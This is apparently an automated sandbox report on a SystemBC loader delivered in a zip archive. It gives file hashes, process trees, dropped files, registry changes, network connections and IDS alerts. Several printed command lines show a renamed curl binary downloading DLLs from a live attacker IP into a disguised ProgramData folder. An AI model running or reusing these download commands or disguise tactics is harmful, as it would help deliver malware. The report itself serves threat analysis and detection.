File name:

progriubh.zip

Full analysis: https://app.any.run/tasks/fba8bbc6-6caa-48c7-ab5b-687df459cf36
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: June 22, 2023, 00:42:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
systembc
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

026FB1E6FD47FB7ECC50FD51AD6E6514

SHA1:

D5321C58CB77D450E472DD5C99D70FE5CB2701A1

SHA256:

F7EA6277CE094F7090E0795DF2CAD601758B8969EE6FFF062D49782583741314

SSDEEP:

3072:MSKnUsAuN4J0HcKRLq5LFnN0jA4QRCkuGBRPUjiQf:7KZAuWiPpsLFnWiWAsHf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • wplugin1.exe (PID: 1156)
      • bh.exe (PID: 3472)
      • wplugin1.exe (PID: 1116)
      • wplugin1.exe (PID: 2940)
      • wplugin1.exe (PID: 3068)
      • wplugin1.exe (PID: 2016)
    • Loads dropped or rewritten executable

      • bh.exe (PID: 3472)
    • SYSTEMBC detected by memory dumps

      • wplugin1.exe (PID: 2940)
      • wplugin1.exe (PID: 1116)
      • wplugin1.exe (PID: 3068)
      • wplugin1.exe (PID: 2016)
  • SUSPICIOUS

    • Connects to the server without a host name

      • bh.exe (PID: 3472)
      • wplugin1.exe (PID: 1156)
    • Reads settings of System Certificates

      • bh.exe (PID: 3472)
    • Executable content was dropped or overwritten

      • bh.exe (PID: 3472)
      • wplugin1.exe (PID: 1156)
    • Process requests binary or script from the Internet

      • wplugin1.exe (PID: 1156)
      • bh.exe (PID: 3472)
    • Reads the Internet Settings

      • bh.exe (PID: 3472)
  • INFO

    • Manual execution by a user

      • bh.exe (PID: 3472)
    • Checks supported languages

      • wplugin1.exe (PID: 2016)
      • bh.exe (PID: 3472)
      • wplugin1.exe (PID: 1116)
      • wplugin1.exe (PID: 3068)
      • wplugin1.exe (PID: 1156)
      • wplugin1.exe (PID: 2940)
    • Reads the computer name

      • wplugin1.exe (PID: 2016)
      • bh.exe (PID: 3472)
    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 2732)
    • Creates files in the program directory

      • bh.exe (PID: 3472)
      • wplugin1.exe (PID: 1156)
    • The process checks LSA protection

      • bh.exe (PID: 3472)
    • Reads Environment values

      • bh.exe (PID: 3472)
    • Reads the machine GUID from the registry

      • bh.exe (PID: 3472)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: WebDAVProxyCore.dll
ZipUncompressedSize: 205312
ZipCompressedSize: 92036
ZipCRC: 0xbc67fbaf
ZipModifyDate: 2023:05:28 21:34:46
ZipCompression: Deflated
ZipBitFlag: -
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
49
Monitored processes
8
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start drop and start winrar.exe searchprotocolhost.exe no specs bh.exe #SYSTEMBC wplugin1.exe wplugin1.exe #SYSTEMBC wplugin1.exe #SYSTEMBC wplugin1.exe #SYSTEMBC wplugin1.exe

Process information

PID
CMD
Path
Indicators
Parent process
1116"C:\ProgramData\ASUSBackup\wplugin1.exe" -s -k "http://128.140.95.220/bat5632/php_ioncube.dll" -o "C:\ProgramData\ASUSBackup\ext\php_ioncube.dll"C:\ProgramData\ASUSBackup\wplugin1.exe
bh.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
7.80.0
Modules
Images
c:\programdata\asusbackup\wplugin1.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
1156"C:\ProgramData\ASUSBackup\wplugin1.exe" -s -k "http://128.140.95.220/bat5632/msvcr110.dll" -o "C:\ProgramData\ASUSBackup\msvcr110.dll"C:\ProgramData\ASUSBackup\wplugin1.exe
bh.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
7.80.0
Modules
Images
c:\programdata\asusbackup\wplugin1.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
1592"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe4_ Global\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" C:\Windows\System32\SearchProtocolHost.exeSearchIndexer.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft Windows Search Protocol Host
Exit code:
0
Version:
7.00.7601.24542 (win7sp1_ldr_escrow.191209-2211)
Modules
Images
c:\windows\system32\searchprotocolhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2016"C:\ProgramData\ASUSBackup\wplugin1.exe" -s -k "https://windows.php.net/downloads/releases/archives/php-5.6.9-nts-Win32-VC11-x86.zip" -o "C:\ProgramData\ASUSBackup\php-5.6.9-nts-Win32-VC11-x86.zip"C:\ProgramData\ASUSBackup\wplugin1.exe
bh.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
7.80.0
Modules
Images
c:\programdata\asusbackup\wplugin1.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
2732"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\progriubh.zip"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
2940"C:\ProgramData\ASUSBackup\wplugin1.exe" -s -k "http://128.140.95.220/bat5632/php_ioncube.dll" -o "C:\ProgramData\ASUSBackup\ext\php_ioncube.dll"C:\ProgramData\ASUSBackup\wplugin1.exe
bh.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
7.80.0
Modules
Images
c:\programdata\asusbackup\wplugin1.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
3068"C:\ProgramData\ASUSBackup\wplugin1.exe" -s -k "http://128.140.95.220/bat5632/php_ioncube.dll" -o "C:\ProgramData\ASUSBackup\ext\php_ioncube.dll"C:\ProgramData\ASUSBackup\wplugin1.exe
bh.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
7.80.0
Modules
Images
c:\windows\system32\ntdll.dll
c:\programdata\asusbackup\wplugin1.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\user32.dll
c:\windows\system32\rpcrt4.dll
3472"C:\Users\admin\Desktop\bh.exe" C:\Users\admin\Desktop\bh.exe
explorer.exe
User:
admin
Company:
DriveHQ.com
Integrity Level:
MEDIUM
Description:
WebDAVProxyCoreSvc
Exit code:
0
Version:
3.1.740.895
Modules
Images
c:\users\admin\desktop\bh.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
Total events
4 783
Read events
4 752
Write events
31
Delete events
0

Modification events

(PID) Process:(2732) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\16D\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2732) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip
(PID) Process:(2732) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(2732) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(2732) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(2732) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(2732) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(2732) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(3472) bh.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3472) bh.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
Executable files
364
Suspicious files
19
Text files
62
Unknown types
0

Dropped files

PID
Process
Filename
Type
2732WinRAR.exeC:\Users\admin\Desktop\WebDAVProxyCore.dllexecutable
MD5:5A70D8404C1E2C794A699607508335BE
SHA256:E5CD5AE55DB9FA9116DE02C3A93325738AA05ABEDE34B77216BB583B7BCF5FAE
2732WinRAR.exeC:\Users\admin\Desktop\bh.exeexecutable
MD5:B9309EDEBDD88850C4C42D887F5926A9
SHA256:2B41B60429BAE011399154F9700081A3EAA202A35F3EFE2F3A0DC1349770DD3F
3472bh.exeC:\ProgramData\ASUSBackup\tagtext
MD5:B6A666F0B2745110BD626A09EBFE6767
SHA256:D8F441C5E005AD03C2FA4A3FCBCCCF3F83D5C90EC022B8FF589A1AA3810BFAD8
2732WinRAR.exeC:\Users\admin\Desktop\tagtext
MD5:B6A666F0B2745110BD626A09EBFE6767
SHA256:D8F441C5E005AD03C2FA4A3FCBCCCF3F83D5C90EC022B8FF589A1AA3810BFAD8
3472bh.exeC:\ProgramData\ASUSBackup\ext\DotNetZip-nuvb05vp.tmpexecutable
MD5:2E83D3A008F9D9BF6C6785D4FEBA5C75
SHA256:D1457076B72D629F0AF7E98CD6FE5BE4FB0B18FB9C15675F2995B4C5E88A8106
3472bh.exeC:\ProgramData\ASUSBackup\DotNetZip-10cfhecu.tmpexecutable
MD5:B421A198C2A05D5992A7EAE71E4F968E
SHA256:90D579BB069A64D510BA3796065020FF30222CAFEF2C0D49D656A4F8BCB11A1E
3472bh.exeC:\ProgramData\ASUSBackup\dev\php5.libbinary
MD5:D0AD82EB68B6C43243DD38D88468AAD7
SHA256:5736E1DCBA161DADFB581B885069D686D0ECCCECB9559874C82512D8FD14A8C1
3472bh.exeC:\ProgramData\ASUSBackup\ext\DotNetZip-f1h2nnoy.tmpexecutable
MD5:E6356BB0442E22F4C833C8F3FAA12E54
SHA256:E7ACC59480842E662351C2026F08AB67971EE33C34C663CE509A4C9473E643FA
3472bh.exeC:\ProgramData\ASUSBackup\wplugin1.exeexecutable
MD5:A508F132173CB34450C051220367634E
SHA256:21ECE0AD8B38F4DC72DDE054C9F5677BFC8E117D770A937D379FB0556078BB26
3472bh.exeC:\ProgramData\ASUSBackup\deplister.exeexecutable
MD5:B421A198C2A05D5992A7EAE71E4F968E
SHA256:90D579BB069A64D510BA3796065020FF30222CAFEF2C0D49D656A4F8BCB11A1E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
17
DNS requests
3
Threats
448

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3472
bh.exe
GET
200
128.140.95.220:80
http://128.140.95.220/bat5632/wplugin1.exe
IR
executable
4.30 Mb
suspicious
1156
wplugin1.exe
GET
200
128.140.95.220:80
http://128.140.95.220/bat5632/msvcr110.dll
IR
executable
854 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1076
svchost.exe
224.0.0.252:5355
unknown
2016
wplugin1.exe
83.137.149.15:443
windows.php.net
Duocast B.V.
NL
unknown
3472
bh.exe
128.140.95.220:80
Hetzner Online GmbH
IR
suspicious
1820
svchost.exe
239.255.255.250:1900
whitelisted
3472
bh.exe
83.137.149.15:443
windows.php.net
Duocast B.V.
NL
unknown
1156
wplugin1.exe
128.140.95.220:80
Hetzner Online GmbH
IR
suspicious
2940
wplugin1.exe
128.140.95.220:80
Hetzner Online GmbH
IR
suspicious
1116
wplugin1.exe
128.140.95.220:80
Hetzner Online GmbH
IR
suspicious

DNS requests

Domain
IP
Reputation
dns.msftncsi.com
  • 131.107.255.255
shared
windows.php.net
  • 83.137.149.15
unknown

Threats

PID
Process
Class
Message
3472
bh.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
3472
bh.exe
Misc activity
ET INFO Packed Executable Download
3472
bh.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3472
bh.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
3472
bh.exe
Generic Protocol Command Decode
SURICATA STREAM ESTABLISHED packet out of window
3472
bh.exe
Generic Protocol Command Decode
SURICATA STREAM ESTABLISHED packet out of window
3472
bh.exe
Generic Protocol Command Decode
SURICATA STREAM ESTABLISHED invalid ack
3472
bh.exe
Generic Protocol Command Decode
SURICATA STREAM Packet with invalid ack
3472
bh.exe
Generic Protocol Command Decode
SURICATA STREAM ESTABLISHED packet out of window
3472
bh.exe
Generic Protocol Command Decode
SURICATA STREAM ESTABLISHED packet out of window
No debug info